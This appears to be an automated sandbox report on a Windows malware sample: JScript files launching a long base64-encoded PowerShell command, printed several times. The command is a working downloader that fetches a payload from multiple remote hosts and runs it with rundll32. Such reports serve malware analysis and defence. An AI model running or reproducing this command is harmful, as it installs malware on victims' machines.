Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | May 25, 2023, 10:43 a.m. | May 25, 2023, 10:45 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\envenomation.js
3036-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\Heteromorphic.js" blateroonPursership WhoosisInterall scatbacksNanoinstruction
1604-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA="
568
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAWQBnAEEAPQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB4AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHkAQQBEAFEAQQBOAGcAQQB2AEEASABRAEEATAB3AEIAVQBBAEYAWQBBAGMAdwBCAEIAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAGMAQQBXAGcAQQAwAEEARgBJAEEAUwBRAEIARwBBAEYAbwBBAFEAZwBCAHUAQQBBAD0APQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHYAQQBEAFEAQQBlAEEAQgBJAEEARwA4AEEAYwBRAEIAcwBBAEcAMABBAFcAQQBCAFYAQQBHAGsAQQBUAHAAZQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBFAE0AQQBNAGcAQgBwAEEARwBJAEEAYQBRAEIAUwBBAEgATQBBAFEAdwBCAHkAQQBFADgAQQBXAEEAQQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFQAcgBpAG0AbwBsAGUAYwB1AGwAYQByAEMAZQByAGEAdABvAGQAaQBkAGEAZQAgAGkAbgAgACQAUgBlAG0AaQBnAHIAYQB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAFQAcABlAE4AIgApACAAewB0AHIAeQAgAHsAJABEAGUAbABpAHEAdQBpAHUAbQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAVQBBAGIAQQBCAHAAQQBIAEEAQQBiAHcAQgB1AEEARwBrAEEAYgBnAEIAaABBAEcAVQBBAFMAQQBCAHAAQQBHAHcAQQBiAEEAQgB2AEEARwBFAEEAWgBRAEIAawBBAEMANABBAFoAQQBCAHIAQQBBAD0APQBrAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEgAWQBBAFoAUQBCAHkAQQBHAFUAQQBaAEEAQgBFAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGIAZwBCAGsAQQBHAFUAQQBaAEEAQgBzAEEASABrAEEATABnAEIAbQBBAEcAOABBAGMAZwBCAHoAQQBHAEUAQQBiAEEAQgBsAEEAQQA9AD0AIgA7ACQAUABvAHIAbwBwAG8AcgBvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBuAEEARwBFAEEAYgBBAEIAbABBAEgATQBBAFkAUQBCADEAQQBIAEkAQQBkAFEAQgB6AEEARgBBAEEAYwBnAEIAdgBBAEcATQBBAFoAUQBCAHkAQQBHAGsAQQBkAEEAQgBwAEEARwBNAEEATABnAEIAaQBBAEcARQBBAGMAZwBCAG4AQQBHAEUAQQBhAFEAQgB1AEEASABNAEEAIgA7ACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVAByAGkAbQBvAGwAZQBjAHUAbABhAHIAQwBlAHIAYQB0AG8AZABpAGQAYQBlACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAcABvAGwAZQBzAHQAYQByAFAAbwBuAHQAaQBmAGkAYwBlAHMAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwA7ACQAUwB0AHUAbgBuAGUAcgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABNAEEAWQB3AEIAeQBBAEcAawBBAFkAZwBCAGgAQQBHADQAQQBiAHcAQgBWAEEARwA0AEEAYwB3AEIAaABBAEcATQBBAGMAZwBCAGwAQQBHAFEAQQBMAGcAQgB5AEEARwBFAEEAWQB3AEIAcABBAEcANABBAFoAdwBBAD0AIgA7ACQAYwBvAHIAawBpAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBjAEEAQgB3AEEARwA4AEEAYwB3AEIAcABBAEgAUQBBAGEAUQBCAHcAQQBHADgAQQBiAEEAQgBoAEEASABJAEEAUQB3AEIANQBBAEgAUQBBAGIAdwBCAHQAQQBHAGsAQQBZAHcAQgB5AEEARwA4AEEAYwB3AEIAdgBBAEcAMABBAFoAUQBBAHUAQQBHAE0AQQBiAHcAQgB2AEEARwBzAEEAYQBRAEIAdQBBAEcAYwBBAFcAUwA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgAwAEEARwBVAEEAYgBBAEIAbABBAEgATQBBAFkAdwBCAHYAQQBIAEEAQQBhAFEAQgBqAEEARgBVAEEAYgBnAEIAaABBAEgAQQBBAGMAQQBCAHMAQQBHAEUAQQBkAFEAQgBrAEEARwBVAEEAWgBBAEEAdQBBAEcATQBBAFkAUQBCAHoAQQBHAEUAQQBXAFMAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBaAEEAQgBsAEEASABJAEEAWgBRAEIANQBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBhAHcAQgBwAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGIAZwBBAD0AIgA7ACQAYgBhAHIAZwBoAGUAcwB0AHMAUwBhAHAAcgBvAGIAaQBjAGEAbABsAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFEAQQBOAFEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE4AZwBBADUAQQBDADQAQQBNAFEAQQB6AEEARABVAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAVQBuAGQAZQByAHUAdABpAGwAaQB6AGUALgBHAG8AdgBlAHIAbgBpAG4AZwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAyADkAOAA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBVAEEAYgBnAEIAawBBAEcAVQBBAGMAZwBCADEAQQBIAFEAQQBhAFEAQgBzAEEARwBrAEEAZQBnAEIAbABBAEMANABBAFIAdwBCAHYAQQBIAFkAQQBaAFEAQgB5AEEARwA0AEEAYQBRAEIAdQBBAEcAYwBBAEwAQQBCAGkAQQBHAGsAQQBiAGcAQgBrAEEARABzAEEAIgA7ACQAYgBpAGEAbgBuAHUAYQBsAGwAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcARQBBAGIAQQBCAHMAQQBHAEUAQQBhAEEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEgAQQBBAGQAUQBCADAAQQBHAFUAQQBjAGcAQQA9AGQAWQBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAHYAQQBHAFUAQQBiAGcAQgBzAEEARwBFAEEAYwBnAEIAbgBBAEcAVQBBAGIAUQBCAGwAQQBHADQAQQBkAEEAQgBQAEEARwBNAEEAZABBAEIAdgBBAEcAUQBBAFkAUQBCAGoAQQBIAFEAQQBlAFEAQgBzAEEARwA4AEEAZABRAEIAegBBAEMANABBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAPQBkAFkASABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEkAQQBOAGcAQQB1AEEARABFAEEATgBnAEEANQBBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAFEAQQAxAEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7AH0AfQA=" |
cmdline | powershell -encodedcommand "JABFAGwAdQBhAHQAZQBkAEEAcABsAGUAYwB0AHIAdQBtACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEASABFAEEAZABRAEIAcABBAEgATQBBAGEAUQBCAG4AQQBHADQAQQBZAFEAQgBzAEEAQwA0AEEAWgBRAEIAdQBBAEcAYwBBAGEAUQBCAHUAQQBHAFUAQQBaAFEAQgB5AEEAQQA9AD0AIgA7ACQAUwBjAGEAcgBjAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGUAUQBCAGgAQQBHADQAQQBiAHcAQgB3AEEASABNAEEAYQBRAEIAaABBAEYAQQBBAGMAZwBCAGgAQQBHAFUAQQBjAHcAQgBwAEEARwBRAEEAYQBRAEIAaABBAEMANABBAFoAQQBCAHAAQQBIAEkAQQBaAFEAQgBqAEEASABRAEEAYgB3AEIAeQBBAEgAawBBAFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEAYwBnAEIAcABBAEcAVQBBAEwAZwBCADAAQQBHAGcAQQBaAFEAQgBoAEEASABRAEEAWgBRAEIAeQBBAEEAPQA9AFIAcwBwAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEcAVQBBAGMAZwBCAGgAQQBIAFUAQQBiAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFUAQQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBVAEEAYwB3AEEAdQBBAEcATQBBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEAQQA9AD0AUgBzAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBOAFEAQQAwAEEAQwA0AEEATgBBAEEANABBAEEAPQA9ACIAOwAkAFIAZQBtAGkAZwByAGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AQQBBAHUAQQBEAEkAQQBNAEEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAQQBBAEwAZwBBAHgAQQBEAFEAQQBOAEEAQQB2AEEASABvAEEAYgB3AEIAMABBAEQAZwBBAE0AZwBBAHYAQQBFAFEAQQBVAEEAQgBGAEEARwBjAEEAW